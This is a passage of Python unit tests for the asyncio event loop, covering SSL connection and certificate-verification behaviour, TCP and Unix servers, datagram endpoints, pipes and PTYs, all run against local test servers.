with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=support.LOOPBACK_TIMEOUT)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
